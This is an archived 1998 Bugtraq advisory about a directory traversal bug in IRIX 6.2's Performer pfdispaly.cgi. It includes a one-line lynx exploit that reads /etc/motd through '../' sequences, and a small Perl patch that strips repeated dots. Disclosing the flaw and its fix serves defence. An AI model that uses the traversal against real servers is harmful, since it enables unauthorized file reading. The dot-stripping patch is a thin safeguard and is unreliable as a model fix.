IRIX performer_tools bug


J.A. Gutierrez (spd@GTC1.CPS.UNIZAR.ES)
Tue, 17 Mar 1998 00:06:48 +0100


> ----------
> From: J.A. Gutierrez[SMTP:SPD@GTC1.CPS.UNIZAR.ES]
> Sent: Monday, March 16, 1998 3:06:48 PM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: IRIX performer_tools bug
> Auto forwarded by a Rule
>
    Do you remember the /cgi-bin/handler bug?

    Well, more of the same:

    Software:
    IRIX 6.2
    performer_tools.sw.webtools (Performer API Search Tool 2.2)
    /var/www/cgi-bin/pfdispaly.cgi

    Bug: Anyone can read files (as 'nobody') from your system:

    Exploit:

    lynx -source \
    'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    for instance :-)

    Fix:

*** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
  $fullcgiroot = "/var/www$cgiroot";

  $shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
  $fullfilepath = "$maindocroot$shortfilepath";
  ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;

    Note: I haven't tested the other Performer CGI's too much,
    maybe they will have more nasty bugs.
    (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
    prepended; but somewhere 'dangerous' characters are escaped)

    There is another bug at pfsearch.cgi; which lacks of
    a
    print "Content-type: text/html\n\n";
    line, so you get garbage in your browser.

    (and even worse, you have to enable JavaScript if you want
    to use this set of CGIs...)

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)



This archive was generated by hypermail 2.0b3 on Fri Nov 20 1998 - 10:52:47 PST